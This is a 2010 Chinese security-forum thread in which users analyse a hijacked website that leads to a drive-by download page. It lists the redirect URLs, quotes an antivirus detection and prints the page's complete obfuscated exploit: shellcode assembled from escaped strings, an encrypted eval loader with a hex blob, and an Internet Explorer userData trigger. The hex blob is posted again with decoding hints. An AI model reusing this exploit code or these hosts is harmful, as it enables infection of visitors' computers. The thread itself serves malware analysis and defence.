收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 安全区 病毒样本 分享&分析区 网络安全(毒网分析) hXXp://zspx.ilearning.com.cn/
123下一页
返回列表 发新帖
查看: 8699|回复: 22
收起左侧

[已鉴定] hXXp://zspx.ilearning.com.cn/

  [复制链接]
小字
发表于 2010-4-5 16:15:31 | 显示全部楼层 |阅读模式
本帖最后由 小字 于 2010-4-5 16:26 编辑

搜狐热招网页,怎么回事呢?
网盾无反应


回复

举报

是昔流芳
发表于 2010-4-5 16:25:31 | 显示全部楼层
关于:hxxp://zspx.ilearning.com.cn/解密的日志(全体输出 -  12):

Level  0>http://zspx.ilearning.com.cn/
Level  1>http://q.tg250.com.cn
Level  2>http://yiyi2.6600.org:97/xo/dk.html
Level  1>http://q.ustocn.com.cn:95
Level  2>http://yiyi2.6600.org:97/xo/dk.html
Level  1>http://q.taogu.org.cn:95
Level  1>http://q.siyou.org.cn:95
Level  2>http://yiyi2.6600.org:97/xo/dk.html
Level  1>http://q.taogu.org.cn:95
Level  2>http://yiyi2.6600.org:97/xo/dk.html
Level  1>http://s87.cnzz.com/stat.php?id=1656692&web_id=1656692&show=pic1
Level  1>http://www.sohu.com/sohuflash_1.js

analyzed by 是昔流芳

一个都连不上
回复

举报

幸福的猪猪
发表于 2010-4-5 16:27:14 | 显示全部楼层
本帖最后由 幸福的猪猪 于 2010-4-5 16:31 编辑
挂马网页地址:hxxp://yiyi2.6600.org:97/0.htm


这个挂马网页,解析起来有点难度(以我现在解马经验,是蛮有难度的。网上也没有此类挂马网页的解析笔记)所以,直接偷懒,利用特殊渠道,得到病毒样本。
回复

举报

小字
 楼主| 发表于 2010-4-5 16:28:37 | 显示全部楼层
哦,我把avast防护关掉再上,网盾竟然都没反应
回复

举报

幸福的猪猪
发表于 2010-4-5 16:28:57 | 显示全部楼层
附上源代码:


  2. <html><body> <button id='yEcOINWqzAvRosxxYgfclJYYclNTLbYCYFtXENkMxhsYvkGkpiwAZqiGoKePsqQqkxgBXxZQKYzdhiEfqwBXZjZwQp' onclick='WzdLiWKZevlgmLyiBITcqfDodayoljhqyoEwCJBe();' style='display:none'></button> <script language='javascript'> var bak, bak1, bak2, bak3, bak4; bak='%';var wud='%';var tihs='%';var jj=bak+'u'+'4B5B';var lzg='%'; bak1='u'; wud+='u'; tihs+='u';var kk=bak+'u'+'CD36';lzg+='u'; bak2='58';wud+='B'; tihs+='B';var ll=bak+'u'+'BD8F';lzg+='B'; bak3=bak+bak1+'5'; wud+='D'; tihs+='D';var mm=bak+'u'+'E9D0';lzg+='DD'; bak4=bak3+'8'+'58%'+bak1+bak2+bak2;wud+='BC'; tihs+='B';tihs+='D';var oo=bak+'u'+'FB7A';lzg+='7'; var WMAHWM='B%u4627%uA'; var LHAH=bak3+'8'+'5'+'8'+bak+bak1+bak2+bak2+'%u10EB'+jj+'%uC933%uB966%u03B8%u3480%uBD0B%uFAE2%'+'u';var HHAH='05EB%'+'uEBE8%uFFFF%u54FF%uBEA3'+tihs+'%uD9E2%u8D1C'+tihs+'%'; var SSAH='u36BD%uB1FD'+kk+'%u10A1%'+'uD536%u36B5%uD74A%uE4AC%u0355%uBDBF%'+'u2DBD'+'%'; var oah='u455F%u8ED5'+ll+'%uD5BD%uCEE8%uCFD8%u36E9%uB1FB%u0355%u'; var org='u2355%uBDBF%'+'u'; oah+='BDBC%u36BD%uD755%uE4B8%'+org+'5FBD%uD544%uD3D2'+tihs+'%'; var org1='%'+'uD2D5%uBDD3%'; oah+='uC8D5%uD1CF'+mm+'%uAB42%u7D38%uAEC8'+org1+'uD5BD%uCFC8%uD0D1%u36E9'; var org2='uD355%'+'uBDBF%'; oah+='%uB1FB%u3355'+wud+'%u36BD%uD755%uE4BC%'+org2+'u5FBD%'; var org3='%'+'u8ED1%uBD8F%'+'u'; oah+='uD544'+org3+'CED5%uD8D5%uE9D1%uFB36%u55B1%uBCD2'+tihs+'%u'; var org4='5E4%'+'uBFF'; oah+='5536%uBCD7%u5'+org4+'2'+tihs+'%u445F%u513C%uBCBD'+tihs+'%'; var org5='uBDD7%'+'uA7D7%'; oah+='u6136%u7E3C%uBD3D'+tihs+'%'+org5+'uD7EE%'; var org6='uC8BD%u7A44%'+'u'; oah+='u42BD%uE1EB%u7D8E%u3DFD%uBE81%'+org6+'BEB9%uDBE1%uD893%'; var org7='C5%'+'uBDBD%u748E%'+'uEC'; oah+='uF97A%uB9BE%uD8'+org7+'EC%uEAEE%u8EEC%u367D%uE5FB%'; var org8='uBDBC%'+'u3EBD%uBD'; oah+='u9F55%'+org8+'45%u1E54'+tihs+'%u2DBD%uBDD7%uBDD7%uBED7%'; var org9='EE7D%uFB36%'+'u55'; oah+='uBDD7%uBFD7%uBDD5'+tihs+'%u'+org9+'99%uBCBC'+tihs+'%'; var org10='7DD%uEDBD%'+'uEB42%u3495%'+'uD'; oah+='uFB34%uD'+org10+'9FB%uFB36%uD7DD%uD7BD%uD7BD%'; var org11='BD%uEB42%'+'uD791%uD'; oah+='uD7BD%uD7B9%uED'+org11+'7BD%uD7BD%uD5BD%uBDA2%uBDB2%'; var org12='u36C5%'+'uD9F3%uC13D%u4'; oah+='u42ED%u81EB%uFB34%'+org12+'2B5%uC909%u3DB1%uB5C1%'; oah+='uBD42%uB8C9%uC93D%u42B5%u5F09%u3456%u3D3B'+tihs+'%u7ABD%uCDFB'+tihs+'%u'; oah+='BDBD'+oo+'%uBDC9'+tihs+'%uD7BD%uD7BD%uD7BD%u36BD%uDDFB%'; oah+='u42ED%u85EB%u3B36%uBD3D'+tihs+'%uBDD7%uF330%uECC9%uCB42%uEDCD%uCB42%u4'; oah+='2DD%u8DEB%uCB42%u42DD%u89EB%uCB42%u42C5%uFDEB%u4636%u7D8E%u668E%u513C%uB'; oah+='FBD'+tihs+'%u7136%u453E%uC0E9%u34B5%uBCA1%u7D3E%u56B9%u364'; oah+='E%u3671%'+'u3E64%'+'uAD7E%u7D8E%uECED%uEDEE%uEDED%uEDED%uEAE'; oah+='D%uEDED%uEB42%u36B5%uE9C3%uAD55'+wud+'%u55BD%uBDD8'+tihs+'%uD'; oah+='ED5%uCACB%uD5BD%uD5CE%uD2D9%u36E9%uB1FB%u9955'+tihs+'%u3'; oah+='4BD%u81FB%u1CD9%uBDB9'+tihs+'%u1D30%u42DD%u4242%uD8D7%uCB42%u3681%'; oah+='uADFB%uB555'+tihs+'%u8EBD%uEE66%uEEEE%u42EE%u3D6D%u5585%u853D%uC854%'; oah+='u3CAC%uB8C5%u2D2D%u2D2D%uB5C9%u4236%u36E8%u3051%uB8FD%u5D42%u1B5'; oah+='5'+tihs+'%u7EBD%u1D55'+tihs+'%u05BD%uBCAC%u3DB9%uB17F%u55BD%uBD2E'+tihs+'%u5'; oah+='13C%uBCBD'+tihs+'%u4136%u7A3E%u7AB9%u8FBA%u2CC9%u7AB1%uB9FA%u34DE%uF26C%'; oah+='uFA7A%u1DB5%u2AD8%u7A76%uB1FA%uFDEC%uC207%uFA7A%u83AD%u0BA0%u7A8'; oah+='4%uA9FA%uD405%uA669%uFA7A%u03A5%uDBC2%u7A1D%uA1FA%u1441%u108A%uF'; oah+='A7A%u259D%uADB7%uD945%u8D1C'+tihs+'%u36BD%uB1FD%uCD36%u10A1%uD536%u36B5%uD'; oah+='74A%uE4B9%uE955'+tihs+'%u2DBD%u455F%u8ED5%uBD8F%uD5BD%uCEE8%uCFD8%u36'; oah+='E9%u55BB%u42E8%u4242%u5536%uB8D7%u55E4%uBD88'+tihs+'%u445F%u428E%u42EA%uB9EB%uBF56%u7E'; oah+='E5%u4455%u4242%uE642%uBA7B%u3405%uBCE2%u7ADB%uB8FA%u5D42%uEE7'; oah+='E%u6136%uD7EE%uD5FD%uADBD'+tihs+'%u36EA%u9DFB%uA555%u4242%uE542%uEC7'; oah+='E%u36EB%u81C8%uC936%uC593%u48BE%u36EB%u9DCB%u48BE%u748E%uFCF4%uBE10%u8E78%uB26'; oah+='6%uAD03%u6B87%uB5C9%u767C%uBEBA%uFD67%u4C56%uA286%u5AC8%u36E3%u99E3%u60BE%u36DB%uF6B1%uE33'; oah+='6%uBEA1%u3660%u36B9%u78BE%uE316%u7EE4%u6055%u4241%u0F42%u5F4F%u8449%uC05F%u'; oah+='673E%uC6F5%u8F80%u2CC9%u38B1%u1262%uDE06%u6C34%uECF2%u07FD%u1DC2%u2AD8%uA37'; oah+='6%uD919%u2E52%u598F%u3329%uB7AE%u7F11%uF6A4%u79BC%uA230%uEAC9%uB0DB%uFE42%u1103%uC066%u18'; oah+='4D%uEF27%u1A43%u8367%u0BA0%u0584%u69D4%u03A6%uDBC2%u411D%u8A14%u2510%u'; </script> <script language='javascript'> var RWkObpJ8 = eval;aGGw2="6B7C6F3D727C7572203A5C595F2A38682E59292838682C2F2B3A364A505C554A50363A2558583A2610176B7C6F3D5C5355585420727C7572363A38687928797F38687E247E243868252A7E793868242F242F3868792E792A38687E297E243868242E25253868257825783868257B257B3868792F242E3868797C7E7B3868257B252A3868242F252838687E28242E3868792D797E38687F79792C38687F797F7938687F797F793A2610176B7C6F3D444E6A4D684F6A754B53675C5C51544F65657154476B53505B54696D6D5B5F5E587E717F4B7A524A5C4456777E765557676C524C71696A6A7B536C525E4E594C716473206873786E7E7C6D783551555C553655555C55364E4E5C5536727C75365C53555854342610176A7B504A5F736E5B7F686E716E6F4F65734C447853495265675170536C79716755494870485053524C6C5C6B697F6C575E5C6F7F47597770785B7A2073786A3D5C6F6F7C6435342610176B7C6F3D53515454527C4A584A6C202D65252B2D2D2D3035444E6A4D684F6A754B53675C5C51544F65657154476B53505B54696D6D5B5F5E587E717F4B7A524A5C4456777E765557676C524C71696A6A7B536C525E4E594C716473337178737A6975372F342610176B7C6F3D796E5076797E6D6F7F6F6854547E5A716D6C4E736A48576A48504449564E6B206873786E7E7C6D78353A38682D7E2D7E38682D7E2D7E3A342610176A7574717835796E5076797E6D6F7F6F6854547E5A716D6C4E736A48576A48504449564E6B337178737A69752153515454527C4A584A6C322F3466101714796E5076797E6D6F7F6F6854547E5A716D6C4E736A48576A48504449564E6B3620796E5076797E6D6F7F6F6854547E5A716D6C4E736A48576A48504449564E6B261017141017606B7C6F3D655353687055684D72767E6C716C6E72787E52757E5B485C517758474C796B556A7B7B5F586F495075746A7C5355695F6C595144676F7420796E5076797E6D6F7F6F6854547E5A716D6C4E736A48576A48504449564E6B336E687F6E696F74737A352D3153515454527C4A584A6C322F342610177978717869783D796E5076797E6D6F7F6F6854547E5A716D6C4E736A48576A48504449564E6B26101710173D7B726F35694C7673487F4E686D554D7F727E5B45202D263D694C7673487F4E686D554D7F727E5B45212F2A2D263D694C7673487F4E686D554D7F727E5B453636343D6610173D3D6A7B504A5F736E5B7F686E716E6F4F65734C447853495265675170536C79716755494870485053524C6C5C6B697F6C575E5C6F7F47597770785B7A46694C7673487F4E686D554D7F727E5B45403D203D655353687055684D72767E6C716C6E72787E52757E5B485C517758474C796B556A7B7B5F586F495075746A7C5355695F6C595144676F743D363D655353687055684D72767E6C716C6E72787E52757E5B485C517758474C796B556A7B7B5F586F495075746A7C5355695F6C595144676F743D363D444E6A4D684F6A754B53675C5C51544F65657154476B53505B54696D6D5B5F5E587E717F4B7A524A5C4456777E765557676C524C71696A6A7B536C525E4E594C7164732610173D602610174C64654B502E203F537C533F2644795C7378572C203F537C533F26706E54786F28203F537C533F266C5659522E203F537C533F266E4B6D494B7B452D203F537C533F265451784A2E203F537C533F2656744D72722E203F537C533F26707B4B45552F203F537C533F264A5F4D682A203F537C533F266E52597E5B7B4F2C203F537C533F26496F5B5329203F537C533F26716D4C4528203F537C533F267C5A5A6A2F203F537C533F26485273572C203F537C533F264F4A76527F6D5725203F537C533F26";QyxVM3="function YdAneJ1(){msIer5=Math.PI;qKDO3=parseInt;sVpTVfX0='length';ILeW3=qKDO3(~((msIer5&msIer5)|(~msIer5&msIer5)&(msIer5&~msIer5)|(~msIer5&~msIer5)));KiPoo3=qKDO3(((ILeW3&ILeW3)|(~ILeW3&ILeW3)&(ILeW3&~ILeW3)|(~ILeW3&~ILeW3))&1);/*Encrypt By Dadong's JSXX 0.31 VIP*/mfVXH2=KiPoo3<<KiPoo3;WBPu7=ILeW3;WBPu7=ILeW3;sODcFfR1='';TrFN4=eval(unescape('%5'+'3%74%'+'72%69%6'+'E%67%2E%'+'66%72%'+'6F%6D%4'+'3%68%61'+'%72%4'+'3%6F'+'%64%65'));UOnJ1=RWkObpJ8;for(lpQX5=ILeW3;lpQX5<QyxVM3[sVpTVfX0];lpQX5-=-KiPoo3)WBPu7+=QyxVM3.charCodeAt(lpQX5);WBPu7%=unescape(ILeW3+unescape('x')+(1<<6));for(lpQX5=ILeW3;lpQX5<aGGw2[sVpTVfX0];lpQX5+=mfVXH2)sODcFfR1+=TrFN4(qKDO3(ILeW3+unescape('x')+aGGw2.charAt(lpQX5)+aGGw2.charAt(lpQX5+qKDO3(KiPoo3)))^WBPu7);try{UOnJ1(sODcFfR1);}catch(e){try{RWkObpJ8(sODcFfR1);}catch(e) {window.location='/';}}}try{RWkObpJ8('YdAneJ1();')}catch(e) {alert('ere');}";var bpVmqe6 = RWkObpJ8(RWkObpJ8);bpVmqe6(QyxVM3);function WzdLiWKZevlgmLyiBITcqfDodayoljhqyoEwCJBe(){  var mNkQBGGxtqlghauiaUpjbyCOjIVbnWnqDQBAuhOv = document.createElement('body');  mNkQBGGxtqlghauiaUpjbyCOjIVbnWnqDQBAuhOv.addBehavior('#default#userData');  document.appendChild(mNkQBGGxtqlghauiaUpjbyCOjIVbnWnqDQBAuhOv);  try {  for (tQknUbSupHPbocFX=0; tQknUbSupHPbocFX<10; tQknUbSupHPbocFX++) {  mNkQBGGxtqlghauiaUpjbyCOjIVbnWnqDQBAuhOv.setAttribute('s',window);  }  } catch(e){ }  window.status+=''; }  document.getElementById('yEcOINWqzAvRosxxYgfclJYYclNTLbYCYFtXENkMxhsYvkGkpiwAZqiGoKePsqQqkxgBXxZQKYzdhiEfqwBXZjZwQp').onclick(); </script></body></html>
复制代码
回复

举报

小字
 楼主| 发表于 2010-4-5 16:31:52 | 显示全部楼层
e,看不懂。看到那么多英文字母就头大
回复

举报

basketmn
头像被屏蔽
发表于 2010-4-5 16:38:22 | 显示全部楼层
hxxp://jnty5.3322.org:28/.xaml
回复

举报

250662772
发表于 2010-4-5 17:07:00 | 显示全部楼层
本帖最后由 250662772 于 2010-4-5 17:11 编辑
e,看不懂。看到那么多英文字母就头大
小字 发表于 2010-4-5 16:31


第一种方法就是直接解下面这段数字,当然也可以把代码放到神器里面执行,也可以修改源代码直接运行解密.

  2. 6B7C6F3D727C7572203A5C595F2A38682E59292838682C2F2B3A364A505C554A50363A2558583A2610176B7C6F3D5C5355585420727C7572363A38687928797F38687E247E243868252A7E793868242F242F3868792E792A38687E297E243868242E25253868257825783868257B257B3868792F242E3868797C7E7B3868257B252A3868242F252838687E28242E3868792D797E38687F79792C38687F797F7938687F797F793A2610176B7C6F3D444E6A4D684F6A754B53675C5C51544F65657154476B53505B54696D6D5B5F5E587E717F4B7A524A5C4456777E765557676C524C71696A6A7B536C525E4E594C716473206873786E7E7C6D783551555C553655555C55364E4E5C5536727C75365C53555854342610176A7B504A5F736E5B7F686E716E6F4F65734C447853495265675170536C79716755494870485053524C6C5C6B697F6C575E5C6F7F47597770785B7A2073786A3D5C6F6F7C6435342610176B7C6F3D53515454527C4A584A6C202D65252B2D2D2D3035444E6A4D684F6A754B53675C5C51544F65657154476B53505B54696D6D5B5F5E587E717F4B7A524A5C4456777E765557676C524C71696A6A7B536C525E4E594C716473337178737A6975372F342610176B7C6F3D796E5076797E6D6F7F6F6854547E5A716D6C4E736A48576A48504449564E6B206873786E7E7C6D78353A38682D7E2D7E38682D7E2D7E3A342610176A7574717835796E5076797E6D6F7F6F6854547E5A716D6C4E736A48576A48504449564E6B337178737A69752153515454527C4A584A6C322F3466101714796E5076797E6D6F7F6F6854547E5A716D6C4E736A48576A48504449564E6B3620796E5076797E6D6F7F6F6854547E5A716D6C4E736A48576A48504449564E6B261017141017606B7C6F3D655353687055684D72767E6C716C6E72787E52757E5B485C517758474C796B556A7B7B5F586F495075746A7C5355695F6C595144676F7420796E5076797E6D6F7F6F6854547E5A716D6C4E736A48576A48504449564E6B336E687F6E696F74737A352D3153515454527C4A584A6C322F342610177978717869783D796E5076797E6D6F7F6F6854547E5A716D6C4E736A48576A48504449564E6B26101710173D7B726F35694C7673487F4E686D554D7F727E5B45202D263D694C7673487F4E686D554D7F727E5B45212F2A2D263D694C7673487F4E686D554D7F727E5B453636343D6610173D3D6A7B504A5F736E5B7F686E716E6F4F65734C447853495265675170536C79716755494870485053524C6C5C6B697F6C575E5C6F7F47597770785B7A46694C7673487F4E686D554D7F727E5B45403D203D655353687055684D72767E6C716C6E72787E52757E5B485C517758474C796B556A7B7B5F586F495075746A7C5355695F6C595144676F743D363D655353687055684D72767E6C716C6E72787E52757E5B485C517758474C796B556A7B7B5F586F495075746A7C5355695F6C595144676F743D363D444E6A4D684F6A754B53675C5C51544F65657154476B53505B54696D6D5B5F5E587E717F4B7A524A5C4456777E765557676C524C71696A6A7B536C525E4E594C7164732610173D602610174C64654B502E203F537C533F2644795C7378572C203F537C533F26706E54786F28203F537C533F266C5659522E203F537C533F266E4B6D494B7B452D203F537C533F265451784A2E203F537C533F2656744D72722E203F537C533F26707B4B45552F203F537C533F264A5F4D682A203F537C533F266E52597E5B7B4F2C203F537C533F26496F5B5329203F537C533F26716D4C4528203F537C533F267C5A5A6A2F203F537C533F26485273572C203F537C533F264F4A76527F6D5725203F537C533F26
复制代码





回复

举报

kanfaner
头像被屏蔽
发表于 2010-4-5 17:15:36 | 显示全部楼层
病毒: JS:ShellCode-ED [Expl] (Engine B)

尝试打开受感染文件

文件: CCA1AE5Cd01
目录: C:\Sandbox\Administrator\Firefox\user\current\Local Settings\Application Data\Mozilla\Firefox\Profiles\egadaghp.default\Cache
回复

举报

小字
 楼主| 发表于 2010-4-5 18:00:00 | 显示全部楼层
回复 8# 250662772


    多谢耐心讲解,可是我对这个一窍不通,都看不懂,没弄过
神器是什么我也不知道哦
回复

举报

下一页 »
123下一页
返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-1-19 07:01 , Processed in 0.129384 second(s), 17 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表